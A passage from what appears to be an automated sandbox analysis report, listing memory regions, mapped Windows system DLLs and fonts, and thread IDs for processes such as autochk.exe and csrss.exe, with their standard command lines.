entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 679 start_va = 0x330000 end_va = 0x42ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 680 start_va = 0x430000 end_va = 0x5b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 681 start_va = 0x50000 end_va = 0x78fff monitored = 0 entry_point = 0x51010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 682 start_va = 0x50000 end_va = 0x78fff monitored = 0 entry_point = 0x51010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 683 start_va = 0x7fefea90000 end_va = 0x7fefeabdfff monitored = 0 entry_point = 0x7fefea91010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 684 start_va = 0x7fefee20000 end_va = 0x7fefef28fff monitored = 0 entry_point = 0x7fefee21064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 685 start_va = 0x5c0000 end_va = 0x740fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 686 start_va = 0x750000 end_va = 0x1b4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 687 start_va = 0x50000 end_va = 0x5cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vssadmin.exe.mui" filename = "\\Windows\\System32\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\vssadmin.exe.mui") Region: id = 688 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 689 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 690 start_va = 0x170000 end_va = 0x1ecfff monitored = 0 entry_point = 0x17cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 691 start_va = 0x210000 end_va = 0x21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 692 start_va = 0x170000 end_va = 0x1ecfff monitored = 0 entry_point = 0x17cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 693 start_va = 0x7fefcdb0000 end_va = 0x7fefcdbefff monitored = 0 entry_point = 0x7fefcdb1010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 694 start_va = 0x180000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 695 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 696 start_va = 0x170000 end_va = 0x170fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 697 start_va = 0x7feff1e0000 end_va = 0x7feff278fff monitored = 0 entry_point = 0x7feff1e1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 698 start_va = 0x200000 end_va = 0x200fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 699 start_va = 0x1ce0000 end_va = 0x1d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ce0000" filename = "" Region: id = 700 start_va = 0x7fefc7b0000 end_va = 0x7fefc7c7fff monitored = 0 entry_point = 0x7fefc7b3b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 701 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 702 start_va = 0x1b50000 end_va = 0x1b94fff monitored = 0 entry_point = 0x1b51064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 703 start_va = 0x1b50000 end_va = 0x1b94fff monitored = 0 entry_point = 0x1b51064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 704 start_va = 0x1b50000 end_va = 0x1b94fff monitored = 0 entry_point = 0x1b51064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 705 start_va = 0x1b50000 end_va = 0x1b94fff monitored = 0 entry_point = 0x1b51064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 706 start_va = 0x1b50000 end_va = 0x1b94fff monitored = 0 entry_point = 0x1b51064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 707 start_va = 0x7fefc4b0000 end_va = 0x7fefc4f6fff monitored = 0 entry_point = 0x7fefc4b1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 708 start_va = 0x1d60000 end_va = 0x202efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 709 start_va = 0x7fefcea0000 end_va = 0x7fefceb3fff monitored = 0 entry_point = 0x7fefcea10e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 710 start_va = 0x1c20000 end_va = 0x1c9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c20000" filename = "" Region: id = 711 start_va = 0x20e0000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020e0000" filename = "" Region: id = 712 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 713 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Thread: id = 24 os_tid = 0xff4 Thread: id = 25 os_tid = 0xffc Thread: id = 26 os_tid = 0xb60 Thread: id = 27 os_tid = 0xb64 Thread: id = 28 os_tid = 0xbe0 Process: id = "4" image_name = "autochk.exe" filename = "c:\\windows\\system32\\autochk.exe" page_root = "0x2450b000" os_pid = "0x100" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0xf4" cmd_line = "\\??\\C:\\Windows\\system32\\autochk.exe *" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 1533 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1534 start_va = 0x1b0000 end_va = 0x22ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1535 start_va = 0x77970000 end_va = 0x77b18fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1536 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1537 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1538 start_va = 0xffb00000 end_va = 0xffbc0fff monitored = 0 entry_point = 0xffb10660 region_type = mapped_file name = "autochk.exe" filename = "\\Windows\\System32\\autochk.exe" (normalized: "c:\\windows\\system32\\autochk.exe") Region: id = 1539 start_va = 0x7feffc90000 end_va = 0x7feffc90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1540 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1541 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 1542 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Thread: id = 238 os_tid = 0x104 Process: id = "5" image_name = "csrss.exe" filename = "c:\\windows\\system32\\csrss.exe" page_root = "0x2c9b9000" os_pid = "0x138" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x130" cmd_line = "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 1636 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1637 start_va = 0x190000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1638 start_va = 0x49d50000 end_va = 0x49d55fff monitored = 0 entry_point = 0x49d51540 region_type = mapped_file name = "csrss.exe" filename = "\\Windows\\System32\\csrss.exe" (normalized: "c:\\windows\\system32\\csrss.exe") Region: id = 1639 start_va = 0x77970000 end_va = 0x77b18fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1640 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1641 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1642 start_va = 0x7feffc90000 end_va = 0x7feffc90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1643 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1644 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 1645 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1646 start_va = 0x2e0000 end_va = 0x3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 1647 start_va = 0x7fefd940000 end_va = 0x7fefd952fff monitored = 0 entry_point = 0x7fefd947c30 region_type = mapped_file name = "csrsrv.dll" filename = "\\Windows\\System32\\csrsrv.dll" (normalized: "c:\\windows\\system32\\csrsrv.dll") Region: id = 1648 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1649 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1650 start_va = 0x7fefd920000 end_va = 0x7fefd930fff monitored = 0 entry_point = 0x7fefd92b1ec region_type = mapped_file name = "basesrv.dll" filename = "\\Windows\\System32\\basesrv.dll" (normalized: "c:\\windows\\system32\\basesrv.dll") Region: id = 1681 start_va = 0x10000 end_va = 0x10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1682 start_va = 0x10000 end_va = 0x10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1683 start_va = 0x7fefd8e0000 end_va = 0x7fefd917fff monitored = 0 entry_point = 0x7fefd8e27c0 region_type = mapped_file name = "winsrv.dll" filename = "\\Windows\\System32\\winsrv.dll" (normalized: "c:\\windows\\system32\\winsrv.dll") Region: id = 1684 start_va = 0x77870000 end_va = 0x77969fff monitored = 0 entry_point = 0x7788a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1685 start_va = 0x7feff010000 end_va = 0x7feff076fff monitored = 0 entry_point = 0x7feff01b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1686 start_va = 0x77750000 end_va = 0x7786efff monitored = 0 entry_point = 0x77765340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1687 start_va = 0x7fefd9d0000 end_va = 0x7fefda3bfff monitored = 0 entry_point = 0x7fefd9d2780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1688 start_va = 0x7feff080000 end_va = 0x7feff08dfff monitored = 0 entry_point = 0x7feff081080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1689 start_va = 0x7fefdc90000 end_va = 0x7fefdd58fff monitored = 0 entry_point = 0x7fefdd0a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1690 start_va = 0x7feff500000 end_va = 0x7feff59efff monitored = 0 entry_point = 0x7feff5025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1691 start_va = 0x10000 end_va = 0x76fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1692 start_va = 0x3e0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 1693 start_va = 0x80000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 1694 start_va = 0x3e0000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1695 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 1696 start_va = 0x180000 end_va = 0x180fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "csrss.exe.mui" filename = "\\Windows\\System32\\en-US\\csrss.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\csrss.exe.mui") Region: id = 1697 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winsrv.dll.mui" filename = "\\Windows\\System32\\en-US\\winsrv.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winsrv.dll.mui") Region: id = 1702 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1703 start_va = 0x1f0000 end_va = 0x1f1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vgasys.fon" filename = "\\Windows\\Fonts\\vgasys.fon" (normalized: "c:\\windows\\fonts\\vgasys.fon") Region: id = 1704 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1705 start_va = 0x670000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 1706 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 1707 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 1708 start_va = 0x7fefd8d0000 end_va = 0x7fefd8dbfff monitored = 0 entry_point = 0x7fefd8d3e50 region_type = mapped_file name = "sxssrv.dll" filename = "\\Windows\\System32\\sxssrv.dll" (normalized: "c:\\windows\\system32\\sxssrv.dll") Region: id = 1709 start_va = 0x5f0000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 1710 start_va = 0x760000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 1711 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 1712 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 1713 start_va = 0x190000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1714 start_va = 0x200000 end_va = 0x200fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1715 start_va = 0x270000 end_va = 0x2affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 1716 start_va = 0x7a0000 end_va = 0x927fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 1779 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "marlett.ttf" filename = "\\Windows\\Fonts\\marlett.ttf" (normalized: "c:\\windows\\fonts\\marlett.ttf") Region: id = 1780 start_va = 0x1b0000 end_va = 0x1c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1781 start_va = 0x210000 end_va = 0x23ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 1782 start_va = 0x6b0000 end_va = 0x72efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 1783 start_va = 0x970000 end_va = 0x9affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 1784 start_va = 0x9f0000 end_va = 0xa2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 1785 start_va = 0xa30000 end_va = 0x1e2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 1786 start_va = 0x7fefd7c0000 end_va = 0x7fefd850fff monitored = 0 entry_point = 0x7fefd7c1440 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1787 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 1788 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 1789 start_va = 0x7feff6c0000 end_va = 0x7feff7ecfff monitored = 0 entry_point = 0x7feff70ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1790 start_va = 0x7fefd7b0000 end_va = 0x7fefd7befff monitored = 0 entry_point = 0x7fefd7b1010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1791 start_va = 0x240000 end_va = 0x243fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 1793 start_va = 0x240000 end_va = 0x240fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 1806 start_va = 0x240000 end_va = 0x240fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 1819 start_va = 0x240000 end_va = 0x240fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 1984 start_va = 0x240000 end_va = 0x24ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 1985 start_va = 0x250000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1986 start_va = 0x260000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 1987 start_va = 0x2b0000 end_va = 0x2b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 1988 start_va = 0x1e30000 end_va = 0x1eeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e30000" filename = "" Region: id = 1989 start_va = 0x1f80000 end_va = 0x1fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 1990 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 2916 start_va = 0x2b0000 end_va = 0x2bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 2917 start_va = 0x2c0000 end_va = 0x2cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 2918 start_va = 0x2d0000 end_va = 0x2dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 2919 start_va = 0x570000 end_va = 0x571fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2920 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2921 start_va = 0x5e0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 2922 start_va = 0x630000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 2923 start_va = 0x640000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 2924 start_va = 0x1fc0000 end_va = 0x207ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001fc0000" filename = "" Region: id = 2925 start_va = 0x2080000 end_va = 0x213ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002080000" filename = "" Region: id = 2926 start_va = 0x650000 end_va = 0x651fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2930 start_va = 0x650000 end_va = 0x650fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 2931 start_va = 0x660000 end_va = 0x661fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 3458 start_va = 0x650000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 3459 start_va = 0x660000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 3460 start_va = 0x730000 end_va = 0x730fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 3684 start_va = 0x730000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 3685 start_va = 0x740000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 3686 start_va = 0x750000 end_va = 0x751fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 3821 start_va = 0x660000 end_va = 0x662fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 4069 start_va = 0x660000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 4070 start_va = 0x750000 end_va = 0x751fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 4074 start_va = 0x750000 end_va = 0x751fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 4077 start_va = 0x750000 end_va = 0x751fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 4240 start_va = 0x750000 end_va = 0x750fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 4260 start_va = 0x750000 end_va = 0x750fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 4393 start_va = 0x750000 end_va = 0x750fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 4407 start_va = 0x750000 end_va = 0x750fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 4410 start_va = 0x750000 end_va = 0x750fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 4502 start_va = 0x750000 end_va = 0x750fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 4529 start_va = 0x750000 end_va = 0x750fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 4567 start_va = 0x750000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 4568 start_va = 0x930000 end_va = 0x931fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 4570 start_va = 0x930000 end_va = 0x931fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 4617 start_va = 0x930000 end_va = 0x930fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 4771 start_va = 0x930000 end_va = 0x930fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 4795 start_va = 0x930000 end_va = 0x930fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 4824 start_va = 0x930000 end_va = 0x932fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 4954 start_va = 0x930000 end_va = 0x931fff monitored = 